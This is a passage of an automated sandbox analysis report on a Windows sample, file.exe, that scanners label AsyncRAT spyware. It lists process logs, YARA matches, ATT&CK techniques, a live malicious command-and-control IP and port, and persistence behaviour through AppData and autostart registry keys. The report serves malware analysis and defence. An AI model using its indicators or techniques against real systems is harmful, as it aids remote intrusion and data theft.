                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: file.exe, 00000000.00000002.3417338709.000000001B8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: file.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.file.exe.2a61cd8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2968, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: file.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.2.file.exe.2a61cd8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2968, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      OS Credential Dumping1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      11
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory33
                      System Information Discovery
                      Remote Desktop Protocol1
                      Screen Capture
                      1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell
                      121
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      Security Account Manager441
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook121
                      Registry Run Keys / Startup Folder
                      2
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets61
                      Virtualization/Sandbox Evasion
                      SSHKeylogging12
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Masquerading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Modify Registry
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job61
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565291 Sample: file.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 40 ip-api.com 2->40 42 g-bing-com.ax-0001.ax-msedge.net 2->42 44 ax-0001.ax-msedge.net 2->44 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 14 other signatures 2->58 8 file.exe 16 6 2->8         started        13 java.exe 2->13         started        15 svchost.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 46 103.230.121.124, 49884, 49986, 7000 VPSQUANUS Hong Kong 8->46 48 ip-api.com 208.95.112.1, 49712, 80 TUT-ASUS United States 8->48 38 C:\Users\user\AppData\Roaming\java.exe, PE32 8->38 dropped 62 Protects its processes via BreakOnTermination flag 8->62 64 Creates autostart registry keys to launch java 8->64 66 Bypasses PowerShell execution policy 8->66 74 3 other signatures 8->74 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 68 Antivirus detection for dropped file 13->68 70 Multi AV Scanner detection for dropped file 13->70 72 Machine Learning detection for dropped file 13->72 50 127.0.0.1 unknown unknown 15->50 file6 signatures7 process8 signatures9 60 Loading BitLocker PowerShell Module 19->60 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      file.exe100%AviraTR/Spy.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\java.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Roaming\java.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\java.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://crl.mwrr0%Avira URL Cloudsafe
                      103.230.121.1240%Avira URL Cloudsafe
                      http://www.microsof.0%Avira URL Cloudsafe
                      http://crl.mEk0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      208.95.112.1
                      truefalse
                        high
                        ax-0001.ax-msedge.net
                        150.171.28.10
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          103.230.121.124true
                          • Avira URL Cloud: safe
                          unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.microsoft.copowershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.micpowershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Iconpowershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000C.00000003.2419893569.0000014D507F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drfalse
                                                high
                                                http://crl.ver)svchost.exe, 0000000C.00000002.3404757837.0000014D50A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.mwrrpowershell.exe, 00000010.00000002.2788544473.000001AA3FCE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://g.live.com/odclientsettings/Prod1C:edb.log.12.drfalse
                                                      high
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://go.microsoft.cpowershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://go.microsoft.ctainpowershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.microsof.powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crl.micft.cMicRosofpowershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.microsoft.cpowershell.exe, 0000000A.00000002.2565979792.0000016045A79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.mEkpowershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        208.95.112.1
                                                                        ip-api.comUnited States
                                                                        53334TUT-ASUSfalse
                                                                        103.230.121.124
                                                                        unknownHong Kong
                                                                        62468VPSQUANUStrue
                                                                        IP
                                                                        127.0.0.1
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1565291
                                                                        Start date and time:2024-11-29 15:18:07 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 23s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
